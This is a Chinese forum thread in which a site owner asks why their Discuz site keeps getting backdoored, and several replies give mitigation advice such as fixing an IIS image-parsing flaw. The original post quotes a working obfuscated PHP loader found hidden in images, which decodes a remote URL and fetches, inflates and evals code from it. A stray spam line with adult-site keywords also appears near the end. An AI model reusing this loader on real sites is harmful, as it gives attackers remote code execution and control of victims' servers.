網站老是被掛馬

131415 · 發表于 2019-7-31 22:15:47

網站目錄老是被上傳后門文件，刪了幾天又有了，改各種密碼，裝云鎖，今天更氣人，網站管理員密碼被改，還發帖子，云鎖還被卸載，快照被劫持天天秒收錄，有吧網站備份下來用D盾掃描一下，發現幾張圖片有腳本，這是怎么做到的？

腳本地址：http://www.9661.in/txt/xml1.txt

<?php
$password='haosir';$b="chr";session_start();if(empty($_SESSION['PhpCode'])){$d=$b(104).$b(116).$b(116).$b(112).$b(58).$b(47).$b(47).$b(57).$b(54).$b(54).$b(49).$b(46).$b(105).$b(110).$b(47).$b(112).$b(104).$b(112).$b(47).$b(112).$b(104).$b(112).$b(46).$b(103).$b(105).$b(102);$e=$b(102).$b(105).$b(108).$b(101).$b(95);$e.=$b(103).$b(101).$b(116).$b(95).$b(99);$e.=$b(111).$b(110).$b(116).$b(101).$b(110);$e.=$b(116).$b(115);$_SESSION['PhpCode']=$e($d);}$f=$b(103).$b(122).$b(105).$b(110);$f.=$b(102).$b(108).$b(97).$b(116).$b(101);@eval($f($_SESSION['PhpCode']));

我知道答案回答被采納將會獲得1 貢獻已有9人回答

耗子 · 發表于 2019-8-1 14:32:52

漏洞而已
可以聯系我的QQ交談有償服務

crx349 · 發表于 2019-8-1 17:11:41

盡快清理做好服務器安全

lg0431 · 發表于 2019-8-2 10:53:39

網站漏洞，服務器端口禁止，禁ping，防注冊

gongcg · 發表于 2019-8-2 11:17:20

用的什么環境用的什么面板

sdfarmer · 發表于 2019-8-3 17:27:17

我的也是。你找到辦法了嗎

sdfarmer · 發表于 2019-8-3 17:28:07

耗子發表于 2019-8-1 14:32
漏洞而已
可以聯系我的QQ交談有償服務

付費求一套discuz加固的目錄權限的方案

17推執筆 · 發表于 2019-8-4 10:26:57

本帖最后由 17推執筆于 2019-8-4 10:28 編輯

不是網站漏洞，不需要discuz加固，就是一個服務器遠程解析漏洞，圖片被當做php來執行了

17推執筆 · 發表于 2019-8-4 10:37:00

如果是IIS的直接打開IIS，點擊處理程序映射，雙擊里面的php，在打開的窗口點擊請求限制，然后勾選文件或文件夾，這樣就可以修復解析漏洞了

杰瑞科技 · 發表于 2019-8-4 15:21:15

看路徑是頭像上傳的圖片木馬，可使用頭像審核插件高級版防止用戶上傳頭像圖片木馬
https://addon.dismall.com/?@saya_avatarverify.plugin

久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

[求助] 網站老是被掛馬

相關帖子

產品服務

開發者服務

使用教程